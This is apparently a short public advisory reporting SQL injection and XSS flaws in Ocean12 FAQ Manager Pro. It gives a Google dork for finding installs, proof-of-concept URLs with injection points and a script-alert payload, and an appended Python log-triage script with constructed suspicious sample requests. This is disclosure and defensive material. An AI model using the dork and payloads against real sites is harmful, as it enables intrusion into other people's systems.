Application: Ocean12 FAQ Manager Pro
Vendor Name: Ocean12
Vendor URL: http://ocean12tech.com/
Bug Type: Ocean12 FAQ Manager Pro (SQL,XSS) Multiple Vulnerabilities
Exploitation: Remote
Google Dork: "Maintained with the Ocean12 FAQ Manager Pro"

SQL POC
http://ocean12tech.com/products/faq/demo/default.asp?Action=Cat&ID=[SQL]
http://ocean12tech.com/products/faq/demo/admin/login.asp?Admin_ID=[SQL]&Password=pass

XSS POC
http://ocean12tech.com/products/faq/demo/default.asp?Action=Search&Keyword=<script>alert("xssed")

Credits: Charalambous Glafkos
Email: glafkos (at) astalavista (dot) com

___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

Best Regards,
Charalambous Glafkos ( nowayout )
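
For administrators of an affected install, the following added example (not part of the original advisory, and not vendor code) triages request URLs from a web server log for the three parameters named above. The allowlists are assumptions (ID as a short decimal number, Admin_ID as a plain account name), and the sample URLs and the host faq.example.test are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed value shapes; the advisory does not document them.
ALLOW_ID = re.compile(r"[0-9]{1,10}")
ALLOW_ADMIN = re.compile(r"[A-Za-z0-9_.@-]{1,64}")
MARKUP = re.compile(r"[<>]")

# (script name, parameter name), both lower-cased -> (finding, predicate)
RULES = {
    ("default.asp", "id"):
        ("non-numeric ID", lambda v: ALLOW_ID.fullmatch(v) is None),
    ("login.asp", "admin_id"):
        ("unexpected Admin_ID characters", lambda v: ALLOW_ADMIN.fullmatch(v) is None),
    ("default.asp", "keyword"):
        ("markup in Keyword", lambda v: MARKUP.search(v) is not None),
}

def triage(url):
    """Return the sorted findings for one request URL (empty list if clean)."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = set()
    # parse_qs percent-decodes values, so encoded input is checked in clear.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        rule = RULES.get((script, name.lower()))
        if rule and any(rule[1](value) for value in values):
            findings.add(rule[0])
    return sorted(findings)

def flagged(urls):
    """Map each URL that has at least one finding to its findings."""
    return {u: f for u in urls if (f := triage(u))}

# Constructed sample requests (not taken from any real log).
SAMPLE_REQUESTS = [
    "http://faq.example.test/default.asp?Action=Cat&ID=3",
    "http://faq.example.test/default.asp?Action=Cat&ID=3%27",
    "http://faq.example.test/admin/login.asp?Admin_ID=admin&Password=pass",
    "http://faq.example.test/admin/login.asp?Admin_ID=a%27b&Password=pass",
    "http://faq.example.test/default.asp?Action=Search&Keyword=reset+password",
    "http://faq.example.test/default.asp?Action=Search&Keyword=%3Cb%3Ehi%3C%2Fb%3E",
]

if __name__ == "__main__":
    for url, findings in flagged(SAMPLE_REQUESTS).items():
        print(url, "->", ", ".join(findings))
```

A finding only means the value falls outside the assumed shape. The fix still belongs in the application: parameterized queries for ID and Admin_ID, and HTML-encoding Keyword on output.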